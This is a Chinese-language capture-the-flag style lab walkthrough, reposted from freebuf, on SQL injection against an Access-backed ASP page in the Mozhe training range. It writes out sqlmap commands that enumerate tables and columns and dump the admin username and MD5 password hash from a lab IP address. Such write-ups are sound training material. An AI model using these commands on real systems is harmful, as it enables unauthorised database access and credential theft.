1.打开靶场以后,因是SQL注入,所以首先要寻找注入点
![图片[2]-墨者SQL注入Access(入门) – 作者:可乐kele-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20210413/1618291791_60752c4f6070f3516221b.jpg)
2.点击维护通知,发现一个新的页面,并且URL处带有id参数
![图片[3]-墨者SQL注入Access(入门) – 作者:可乐kele-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20210413/1618291834_60752c7a3198944b29878.jpg)
3.进行手工探测一下,发现报错
![图片[4]-墨者SQL注入Access(入门) – 作者:可乐kele-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20210413/1618291875_60752ca3281fd3a7442ed.jpg)
4.放到sqlmap直接进行,但是因为是access,此类是没有数据库的,所以直接探测表即可
![图片[5]-墨者SQL注入Access(入门) – 作者:可乐kele-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20210413/1618291936_60752ce0a6573c222029a.jpg)
sqlmap.py-u http://219.153.49.228:40916/new_list.asp?id=1–table![图片[6]-墨者SQL注入Access(入门) – 作者:可乐kele-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20210413/1618291956_60752cf425f8d09641451.jpg)
5.探测表中数据
sqlmap.py -u http://219.153.49.228:40916/new_list.asp?id=1 -T admin -columns
![图片[7]-墨者SQL注入Access(入门) – 作者:可乐kele-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20210413/1618292042_60752d4a05837b562c0b6.jpg)
6.探索用户名密码
ssqlmap.py -u http://219.153.49.228:40916/new_list.asp?id=1 -T admin -C username,passwo –dump
![图片[8]-墨者SQL注入Access(入门) – 作者:可乐kele-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20210413/1618292088_60752d781b31a4241f1a6.jpg)
7.将获得用户名密码记录,其中密码为MD5加密,需要解密,解密后才可登录
来源:freebuf.com 2021-04-13 13:37:14 by: 可乐kele
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
请登录后发表评论
注册